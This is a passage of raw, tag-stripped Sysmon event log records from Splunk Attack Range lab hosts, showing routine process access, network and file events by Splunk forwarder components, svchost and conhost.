Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A2061B21F00E9DE7841638F1C3FB96B,SHA256=9E9A3C874717E7D4F044E4416BA621F8D2638A9EBAB58DBFD6EFDC2FE4464DAB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:47.859{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56369-false10.0.1.12-8000- 23542300x8000000000000000205263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:50.633{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41E164A0B06FCFD2F50F70CF277B3579,SHA256=D8EF1068118DC10BA28822BFB26B43174CBE831634A40F07A1EE3B3D74F78119,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044185Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.438{0A5DF930-180E-629A-1707-000000006002}19643968C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044184Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.282{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-180E-629A-1707-000000006002}1964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044183Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.282{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044182Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.282{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044181Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.282{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044180Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.282{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044179Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.282{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044178Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.282{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044177Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.282{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044176Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.282{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044175Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.282{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-180E-629A-1707-000000006002}1964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044174Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.282{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044173Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.282{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-180E-629A-1707-000000006002}1964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044172Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.283{0A5DF930-180E-629A-1707-000000006002}1964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044171Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.032{0A5DF930-E3BE-6299-9D00-000000006002}2084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=75DF0AE6755FC8564C55E2C91AFDF6F4,SHA256=C67845AC7A024DF98502919F52FD1935DC21DA31233F97B672008E2DD4223984,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:51.770{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DE676357F7AB334F5BD82F2C39AE02D,SHA256=9CAFC2B1599BBAAFF963607628E24520228CF0FEA98C318FED55755EA9BC0446,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044214Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:51.797{0A5DF930-180F-629A-1907-000000006002}29923636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044213Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:51.625{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-180F-629A-1907-000000006002}2992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044212Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:51.625{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044211Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:51.625{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044210Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:51.625{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044209Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:51.625{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044208Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:51.625{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044207Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:51.625{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044206Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:51.625{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044205Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:51.625{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044204Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 